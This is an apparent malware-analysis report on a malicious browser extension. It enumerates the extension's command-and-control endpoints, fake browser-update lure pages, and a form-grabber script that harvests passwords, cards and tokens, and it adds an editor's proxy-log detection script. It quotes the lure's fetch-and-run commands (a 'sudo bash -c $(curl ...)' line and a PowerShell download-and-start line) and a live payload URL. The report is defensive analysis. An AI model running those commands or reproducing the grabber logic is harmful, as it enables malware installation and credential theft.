Complete Security Report

Generated: 2026-03-07
Target extension ID: gengfhhkjekmlejbhmmopegofnoifnjp

1) Endpoint Enumeration and Data Available via Self-Registered UUID

1.1 Endpoint families discovered in code

From background.js and callback scripts, the extension/backend communication surface is:

  • GET /extensions/setup
  • GET /extensions/callback
  • GET /extensions/uninstall (used as uninstall URL)
  • POST /extensions/finish
  • GET /extensions/exe/get-update-data
  • GET /extensions/exe/{modal|bar}/can-show
  • POST /extensions/exe/{modal|bar}/show-later

1.2 Verified live behavior (active UUID)

Probe folder: investigation/probe-20260307-234815-1d4b0fa7
UUID: 1d4b0fa7-c150-4b55-bb3b-1ed4bb5a7632

Endpoint                          Method  Result  Data returned / accepted
/extensions/setup                 GET     200     {"success":true}
/extensions/callback              GET     200     Returns JS task array (history/updater/grabber scripts)
/extensions/exe/get-update-data   GET     200     mode:"file", payload URL: https://baysideceu.com/wp-content/uploads/googleupdate.exe
/extensions/exe/modal/can-show    GET     200     {"success":true,"message":"modal can be shown"...}
/extensions/exe/bar/can-show      GET     200     {"success":true,"message":"bar can be shown"...}
/extensions/exe/modal/show-later  POST    200     nextShowAt, delayHours:1
/extensions/exe/bar/show-later    POST    200     nextShowAt, delayHours:1
/extensions/finish?task_id=64067  POST    200     {"success":true}
/extensions/finish?task_id=64068  POST    200     {"success":true}
/extensions/finish?task_id=64069  POST    200     {"success":true}

1.3 Verified behavior after uninstall state

Probe folder: investigation/probe-20260307-233702-b3928423
UUID: b3928423-3198-494a-9630-6894921545ca

After /extensions/uninstall, attempts to finish tasks return bot-uninstalled errors (retest evidence files):

  • 12_finish_64064_retest.txt
  • 13_finish_64065_retest.txt
  • 14_finish_64066_retest.txt

Observed response pattern:

  • statusCode: 400
  • error: BOT_UNINSTALLED
  • message: Bot is marked as uninstalled

1.4 Original victim UUID behavior

Original UUID: xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

From saved evidence:

  • /extensions/callback => Bot is uninstalled (400)
  • /extensions/exe/modal/can-show and /extensions/exe/bar/can-show => BOT_UNINSTALLED
  • /extensions/exe/get-update-data still returned active payload URL (200)
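Added example (editor's code, not part of the report's evidence set and not the extension's own code): a proxy-log triage helper that turns the endpoint families in 1.1, the hosts seen in 1.2 and section 2, and the takeaways in section 4 into detection logic, so that a bot's UUID, finished task IDs, payload fetch and post-uninstall error responses can be recovered per client from web-proxy logs. The log line format, the client IPs, the C2 host name c2.invalid and the query strings are constructed assumptions (the report lists backend paths but not the backend host); the paths, the ggl.lat template host, the payload URL and the probe UUIDs are taken from the report. The verdict rule is the editor's, not the report's.

```python
"""Proxy-log triage for the C2 surface enumerated in section 1 (added example).

Assumptions, all constructed for this example: the log line format
"<ts> <client-ip> <METHOD> <url> <status>", the C2 host name c2.invalid
(the report lists paths only, not the backend host), and the query strings.
The paths, the ggl.lat template host, the payload URL and the probe UUIDs
are taken from the report."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Endpoint families from section 1.1; (modal|bar) is the {component} slot.
C2_PATH_PATTERNS = [
    ("setup",           r"^/extensions/setup$"),
    ("callback",        r"^/extensions/callback$"),
    ("uninstall",       r"^/extensions/uninstall$"),
    ("finish",          r"^/extensions/finish$"),
    ("get-update-data", r"^/extensions/exe/get-update-data$"),
    ("can-show",        r"^/extensions/exe/(modal|bar)/can-show$"),
    ("show-later",      r"^/extensions/exe/(modal|bar)/show-later$"),
]
C2_PATHS = [(name, re.compile(p)) for name, p in C2_PATH_PATTERNS]

LURE_HOSTS = {"ggl.lat"}                       # section 2: fake-update templates
PAYLOAD_URLS = {                               # section 1.2: get-update-data payload
    "https://baysideceu.com/wp-content/uploads/googleupdate.exe",
}
UUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$")
LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")


def classify_request(method, url):
    """Map one request to (family, details), or None when it is unrelated.

    C2 matching is on the URL path only, so it still holds if the backend
    moves to another host name; lure and payload hosts match as full values."""
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    for family, rx in C2_PATHS:
        m = rx.match(parts.path)
        if not m:
            continue
        details = {"host": parts.hostname, "method": method}
        if m.groups():
            details["component"] = m.group(1)
        if UUID_RE.match(query.get("uuid", "")):
            details["uuid"] = query["uuid"]
        if "task_id" in query:
            details["task_id"] = query["task_id"]
        return family, details
    if parts.hostname in LURE_HOSTS:
        return "lure-template", {"host": parts.hostname, "path": parts.path}
    if url in PAYLOAD_URLS:
        return "payload-download", {"host": parts.hostname}
    return None


def summarize(log_lines):
    """Group hits per client so the whole bot lifecycle is visible at once.

    Verdict rule (editor's judgement, not from the report): 'confirmed' once a
    client both completes a task via /finish (HTTP 200) and fetches lure or
    payload content; 'suspected' on any other hit on the C2 surface.
    4xx answers on C2 paths are counted separately: per section 1.3 they are
    the BOT_UNINSTALLED state, i.e. the client is still calling home."""
    per_client = defaultdict(lambda: {"families": set(), "uuids": set(),
                                      "task_ids": [], "lure_or_payload": False,
                                      "c2_errors": 0})
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                                   # skip malformed lines
        _ts, client, method, url, status = m.groups()
        hit = classify_request(method, url)
        if hit is None:
            continue
        family, details = hit
        rec = per_client[client]
        rec["families"].add(family)
        if "uuid" in details:
            rec["uuids"].add(details["uuid"])
        if family == "finish" and status == "200" and "task_id" in details:
            rec["task_ids"].append(details["task_id"])
        if family in ("lure-template", "payload-download"):
            rec["lure_or_payload"] = True
        if status.startswith("4") and family not in ("lure-template", "payload-download"):
            rec["c2_errors"] += 1
    for rec in per_client.values():
        confirmed = bool(rec["task_ids"]) and rec["lure_or_payload"]
        rec["verdict"] = "confirmed" if confirmed else "suspected"
    return dict(per_client)


# Constructed sample log (not captured traffic); UUIDs are the report's probe UUIDs.
SAMPLE_LOG = """\
2026-03-07T23:48:15Z 10.0.0.5 GET https://c2.invalid/extensions/setup?uuid=1d4b0fa7-c150-4b55-bb3b-1ed4bb5a7632 200
2026-03-07T23:48:16Z 10.0.0.5 GET https://c2.invalid/extensions/callback?uuid=1d4b0fa7-c150-4b55-bb3b-1ed4bb5a7632 200
2026-03-07T23:48:17Z 10.0.0.5 GET https://c2.invalid/extensions/exe/modal/can-show?uuid=1d4b0fa7-c150-4b55-bb3b-1ed4bb5a7632 200
2026-03-07T23:48:18Z 10.0.0.5 GET https://ggl.lat/chrome/modal/ 200
2026-03-07T23:48:19Z 10.0.0.5 GET https://baysideceu.com/wp-content/uploads/googleupdate.exe 200
2026-03-07T23:48:20Z 10.0.0.5 POST https://c2.invalid/extensions/finish?uuid=1d4b0fa7-c150-4b55-bb3b-1ed4bb5a7632&task_id=64067 200
2026-03-07T23:48:21Z 10.0.0.7 GET https://www.example.com/ 200
2026-03-07T23:48:22Z 10.0.0.9 POST https://c2.invalid/extensions/exe/bar/show-later 200
2026-03-07T23:48:23Z 10.0.0.9 POST https://c2.invalid/extensions/finish?uuid=b3928423-3198-494a-9630-6894921545ca&task_id=64064 400
"""

if __name__ == "__main__":
    for client, rec in summarize(SAMPLE_LOG.splitlines()).items():
        print(client, rec["verdict"], sorted(rec["families"]),
              rec["task_ids"], "c2_errors=%d" % rec["c2_errors"])
```

Run as a script it prints one line per client; to use it on real data, replace SAMPLE_LOG with the proxy export converted to the assumed five-field format. Matching C2 traffic by path rather than host is deliberate: the report shows the paths are stable across the extension's code while the backend host is not stated, and a host-only rule would miss a relocated backend.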

2) Fake Update HTML Templates (Social Engineering Content)

Templates fetched from https://ggl.lat and saved in:

  • investigation/probe-20260307-233702-b3928423/ggl_templates/

Available templates captured:

  • chrome_update.html
  • chrome_modal.html
  • chrome_bar.html
  • edge_update.html
  • edge_modal.html
  • opera_update.html
  • opera_modal.html

Failed endpoints at capture time:

  • edge/bar -> 500 Internal Server Error
  • opera/bar -> 500 Internal Server Error

2.1 Notable lure/pressure content

From chrome_modal.html:

  • “Update required”
  • “…further attempts to access websites are blocked.”

From chrome_bar.html:

  • “Update to keep using Chrome after …”
  • “Important Chrome Update”
  • “Warning: Critical Update Required”
  • CTA buttons: “Update now”, “Later”, “Learn more”

From chrome_update.html:

  • “Copy update code” workflow
  • Injected command examples include:
    • sudo bash -c "$(curl -fsSL https://update.chrome.google.com/install)"
    • powershell -Command "Invoke-WebRequest -Uri https://update.chrome.google.com/install.exe -OutFile chrome_update.exe; Start-Process chrome_update.exe"

3) Callback File Function-by-Function Analysis

Analyzed files:

  • investigation/callback_scripts/1-superior-history.js
  • investigation/callback_scripts/2-superior-updater.js
  • investigation/callback_scripts/3-superior-grabber.js

3.1 1-superior-history.js

  • mark()
    • Prevents duplicate execution by checking/creating a DOM marker with id superior-history.
  • Async IIFE
    • Calls mark(); exits if already injected.
    • POSTs to /extensions/finish?uuid=...&task_id=... with JSON:
      • action: "History"
      • current page url
      • page title
      • name: "browser_history"
    • Errors are silently swallowed.

Net effect: a single fire-and-forget beacon that reports the current page URL and title, tagged as a history action.

3.2 2-superior-updater.js

  • getPlatform()
    • Maps navigator.platform to MACOS|WINDOWS|LINUX|unknown.
  • detectBrowser()
    • UA parsing for chrome|edge|opera|firefox|safari; throws on unsupported.
  • waitForElement(selector, timeout)
    • MutationObserver wait helper for DOM id; rejects on timeout.
  • renderHTML(htmlText, targetElementId, options)
    • Parses fetched HTML and injects it into target container or replaces full page.
    • Copies <style>/<link rel=stylesheet> into page, avoiding duplicates.
    • Clones/inserts scripts and retries initApp blocks.
    • Modal mode adjusts overlay z-index and pointer behavior.
  • canShow(component)
    • GET /extensions/exe/{component}/can-show (modal/bar).
  • getUpdateData()
    • GET /extensions/exe/get-update-data; returns JSON used as behavior config.
  • showLater(component)
    • POST /extensions/exe/{component}/show-later.
  • finish()
    • POST /extensions/finish?uuid=...&task_id=...&platform=....
  • loadContent(component, params)
    • Fetches remote HTML from https://ggl.lat/{browser}/{component}/.
  • injectPage()
    • Loads update config + update template and binds action handlers.
  • setupEventHandlers(updateData)
    • mode=file: clicking update button downloads backend-provided payload URL, then calls finish().
    • mode=command: copies backend-provided command to clipboard, then calls finish().
  • injectModal()
    • Checks can-show, loads modal template, injects full-screen modal.
  • setupModalEventHandlers()
    • Close -> showLater('modal') and remove modal.
    • Update -> redirect to official browser update page URL.
  • injectBar()
    • Checks can-show, injects top bar template, adjusts body top padding.
  • setupBarEventHandlers()
    • Handles learn-more, update-now, later flows; later flow POSTs showLater('bar').
  • runInjection()
    • Decides whether to inject update page vs modal+bar by current URL matching.
  • Final IIFE init block
    • Debounced bootstrap, listens to popstate/hashchange, and reinjects if marker removed.

Console output behavior in this file:

  • Uses console.log, console.warn, console.error in multiple flows.

3.3 3-superior-grabber.js

  • ALLOWED_INPUTS
    • Large keyword list for likely sensitive fields (email/phone/name/password/card/address/token/ssn/etc).
  • debugLog(message, data)
    • Wrapper around console.log with [superior-grabber] tag.
  • grab(e)
    • Reads target input value, dedupes by raw value (sentValues Set), and POSTs full captured value via /extensions/finish?...task_id=....
    • Payload includes URL, title, element name/id/type, full value, timestamp.
  • isVisible(elem)
    • Visibility filter (display/visibility/opacity/offsetParent).
  • shouldGrabInput(input)
    • Matches field name/id/type/placeholder against ALLOWED_INPUTS; requires value length >=2.
  • attachListeners(input)
    • Adds delayed handlers for input/change/blur/focus to call grab when predicate matches.
  • checkExistingInputs()
    • Scans existing inputs/select/textarea, attaches handlers, and submits prefilled visible matching values.
  • setupMutationObserver()
    • Watches added DOM nodes and hooks new form elements dynamically.
  • initGrabber IIFE
    • Runs initial scan after DOM ready, sets observer, and on mousemove does periodic rescans to submit matching values.

Console output behavior in this file:

  • Extensive console logging through debugLog plus error logging.

4) Practical Reporting Takeaways

  • Backend control is task-driven: /callback supplies executable JS together with the per-bot UUID and task IDs.
  • Remote content (ggl.lat) provides the browser-themed social-engineering UI and the command/download prompts.
  • /finish is used as the collection/completion sink and accepts task-labeled payloads while the bot is active.
  • The grabber logic captures filled form values for many sensitive field classes.

5) Evidence Index

Primary evidence directories:

  • investigation/probe-20260307-233702-b3928423
  • investigation/probe-20260307-234815-1d4b0fa7
  • investigation/callback_scripts
  • investigation/REPORT_SUMMARY.md
  • investigation/EVIDENCE_TIMELINE.md